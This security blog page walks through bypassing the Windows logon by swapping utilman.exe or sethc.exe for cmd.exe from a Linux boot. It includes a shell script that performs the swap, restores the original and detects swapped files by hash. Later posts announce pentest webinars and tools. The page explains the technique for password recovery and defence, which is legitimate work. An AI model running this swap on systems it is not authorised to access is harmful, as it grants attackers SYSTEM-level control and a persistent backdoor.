How to Log into Windows without the Password

I covered this topic last year (Windows Backdoor: System Level Access via Hot Keys) but just ran into this again recently. How do you gain access to a Windows system that you have legitimately lost the password to?

Well, there seem to be a couple of utilities out there that claim to let you do this. We tried a Linux Live-CD based one that was supposed to allow you to change any Windows password, but it didn’t work.

I even tried Kon-Boot, both the CD-based and USB flash drive varieties. Kon-Boot sounds very cool and comes highly recommended. You boot Kon-Boot first, and after it is booted it loads your OS. Then you can put in any password, or just hit Enter, and it bypasses the login and lets you into the user’s account. It is supposed to work on Windows and Linux systems. But unfortunately it also did not work on my systems.

What to do? Well, I figured I would give my article from last year a shot to see if it still worked. (Okay, just a quick disclaimer: do not do this on a system that you do not own or have permission to modify. Messing with system files could leave your system in an unstable state; if you choose to continue, you do so at your own risk.)

So I booted into Ubuntu, went to the Windows\System32 directory, renamed utilman.exe to utilman.old, copied cmd.exe to utilman.exe and rebooted. At the Windows logon prompt I hit Windows+U and up pops a SYSTEM-level command prompt. From here you can type any Windows command, add users, reset passwords, and so on.

The funny part is that you can type “explorer.exe”, hit Enter, and you get a SYSTEM-level desktop. From here you can open Internet Explorer and surf the web. And while you are doing all this, the Windows login screen dutifully stays in the background protecting(?) your system.

I found the Utilman modification on Microsoft’s TechNet site, but it is not the only one that works. A comment on last year’s post pointed me to another trick on Adam’s Technical Journal. Replacing “sethc.exe” in the same way also bypasses the Windows login screen. The sethc file implements the Windows Sticky Keys function: under normal operation, if you hit the Shift key five times in a row, the Sticky Keys dialog box pops up.

Doing so when sethc.exe has been replaced with a copy of cmd.exe opens a SYSTEM command prompt at the login screen, just like the utilman modification above.

This process still works on a fully patched and updated Windows 7 system. When I checked it last year, it also worked on all of the Windows Server products. Windows protects these system files from modification while it is running, but booting into Linux, where the NTFS permissions on them are not enforced, lets you alter them in a couple of minutes at most.
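The file swap described above, written up as a small shell script added here (it is not code from the original post or from the TechNet article it cites), for running from the Linux side after mounting the Windows partition read-write. The mount point, the function names and the assumption that the caller passes the path to Windows/System32 are this example’s own. It keeps the original binary under a .old name, refuses to clobber an existing backup, restores the original afterwards, and includes the check a defender would run against the same volume: a utilman.exe or sethc.exe whose hash equals that of cmd.exe has been swapped.

```shell
#!/bin/sh
# Added example, not code from the original post. Assumes the Windows volume is
# mounted read-write under Linux (e.g. with ntfs-3g) and that the caller passes
# the path to its Windows/System32 directory. Function names are this example's own.

hash_file() { sha256sum "$1" | cut -d' ' -f1; }

# Replace an accessibility helper (utilman.exe or sethc.exe) with a copy of cmd.exe,
# keeping the original as <name>.old. Refuses to run if a backup already exists,
# so a second run cannot overwrite the only copy of the real binary.
swap_helper() {
    sys32="$1"; helper="$2"
    backup="$sys32/${helper%.exe}.old"
    [ -f "$sys32/$helper" ] || { echo "no $helper in $sys32" >&2; return 1; }
    [ -f "$sys32/cmd.exe" ] || { echo "no cmd.exe in $sys32" >&2; return 1; }
    if [ -e "$backup" ]; then
        echo "$backup already exists; refusing to overwrite it" >&2
        return 1
    fi
    mv "$sys32/$helper" "$backup" && cp "$sys32/cmd.exe" "$sys32/$helper"
}

# Put the original helper back once the password has been reset.
restore_helper() {
    sys32="$1"; helper="$2"
    backup="$sys32/${helper%.exe}.old"
    [ -f "$backup" ] || { echo "no backup for $helper in $sys32" >&2; return 1; }
    mv -f "$backup" "$sys32/$helper"
}

# Defender-side check against the same (or a suspect) volume: a helper that hashes
# identical to cmd.exe has been swapped. Prints each swapped helper; returns 0 if
# clean, 1 if anything was found, 2 if cmd.exe itself is missing.
check_helpers() {
    sys32="$1"
    [ -f "$sys32/cmd.exe" ] || { echo "no cmd.exe in $sys32" >&2; return 2; }
    cmd_hash=$(hash_file "$sys32/cmd.exe")
    found=0
    for h in utilman.exe sethc.exe; do
        [ -f "$sys32/$h" ] || continue
        if [ "$(hash_file "$sys32/$h")" = "$cmd_hash" ]; then
            echo "$h is a copy of cmd.exe"
            found=1
        fi
    done
    return "$found"
}

# Typical use from the live Linux session (device and mount point are assumptions):
#   sudo mount -t ntfs-3g /dev/sda2 /mnt/win
#   swap_helper /mnt/win/Windows/System32 utilman.exe
#   ... reboot, press Windows+U at the logon screen, then: net user <name> <newpassword>
#   ... boot Linux again and run: restore_helper /mnt/win/Windows/System32 utilman.exe
```

Two practical points: an NTFS volume mounted under Linux is case-sensitive, so pass the file name exactly as ls shows it (on disk it may be stored as Utilman.exe rather than utilman.exe), and always run the restore step, because a SYSTEM shell reachable from the logon screen is a backdoor for the next person with physical access, which is exactly what the hash check is there to catch.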

These techniques can be a life saver if you have lost the password to an important system, but they also go to show that strong physical security is needed when securing your systems. Anyone who can boot the machine from their own media can do the same thing; locking down the boot order helps, and full-disk encryption such as BitLocker stops it outright, since an offline boot then cannot read or write System32 at all.

Upcoming free Security Webinars – March 23, 2011

A couple of interesting webinars are coming up (all information is from the presenters’ websites):

For today, a must see is:
Pen Testing Perfect Storm Part VI “We Love Cisco!”

Guest Speakers: Ed Skoudis, Joshua Wright, and Kevin Johnson
Date: Wednesday, March 23, 2011
Time: 2PM EDT / 11AM PDT (GMT -4:00, New York)

About this webcast:
During this webcast, security swashbucklers Ed Skoudis, Joshua Wright and Kevin Johnson will return with more penetration testing madness and demonstrate techniques that you can use to proactively assess the security of Cisco networking equipment throughout your organization. 

You’ll learn how to…

  • Use XSS vulns and Project Yokoso to discover Cisco-centric management interfaces
  • Abuse web interfaces for infrastructure control
  • Leverage SNMP-to-telnet access escalation for switch pwnage
  • Conduct privilege escalation with switch mirror ports
  • Engage in VLAN hopping for fun and profit
  • Set up your own virtual routing lab for practice and testing

Avoiding Data Breach Catastrophe – Beyond 2 Factor Authentication

Join the FS-ISAC and Voltage for a complimentary webcast:
WHEN: Wednesday, March 30, 2011
TIME: 11:00 am EDT / 8:00 am PDT

Recent data breaches at public and private corporations have shown that reliance on perimeter-level security is not sufficient: once hackers find a way in, they are able to collect data unimpeded. A breach at a notable security company has resulted in potential risks to customers using two-factor authentication; however, data protection that relies on secrecy or obscurity may not be a good approach. This session will examine potential risks and suggest strategies for proactively protecting data in all its forms inside the enterprise.

And finally Upcoming SANS webinars:

March 23, 2011:
Analyst Webcast: Managing Insiders (Contractors, Vendors, and Employees) in SCADA Environments
Sponsored By: ArcSight, an HP Company; Industrial Defender; Waterfall Security
March 24, 2011:
Web 2.0 Security: Same old but different
Sponsored By: SonicWall
April 07, 2011:
Improve firewall security odds: Prevent misconfigurations and compliance concerns by automating firewall audits
Sponsored By: Skybox Security, Inc.
April 13, 2011:
Internet Storm Center Threat Update (ISC Webcast)
Sponsored By: Core Security Technologies
April 14, 2011:
Analyst Webcast: Addressing the Top 20 Critical Security Controls with SIEM
Sponsored By: ArcSight, an HP Company

New Version of the Social Engineering Toolkit (SET) Released

David Kennedy, also known as ReL1K has done it again. After slaving over hundreds of lines of code, he has blessed us with a new version of the Social Engineering Toolkit (SET)!

If you haven’t used the Social Engineering Toolkit yet, you are in for a surprise. It is probably the most amazing social engineering penetration testing tool that I have ever seen. The ability to clone an active website and bypass current anti-virus is truly scary. David has also included updated tutorials for the new version (v.07), so check it out!

(As a side note, the SET has proved to be very popular, my Backtrack 4: Social Engineering Toolkit tutorial created back in June has received thousands of hits and is by far the most read article on this site.)

New “Live Hacking v1.2” Linux Security Distro Released

Dr. Ali Jahangiri has released a new version of his Live Linux security CD. The original version was a collection of tools that could be used to test the security of your network.

The new version has added the ever popular Metasploit Framework and also several IPv6 tools (from the website):

The Metasploit Framework, one of the new tools included with this release, can be used to test your network using the framework’s internal database of known weaknesses and exploits.

Also included in this new release of the Live Hacking CD is the THC-IPV6 tool, a set of tools to attack the inherent protocol weaknesses of IPv6 and ICMP6.

The original “Live Hacking” CD was interesting, kind of like a scaled-down version of BackTrack. The added tools give this distribution a lot more capability. Check it out when you get a chance!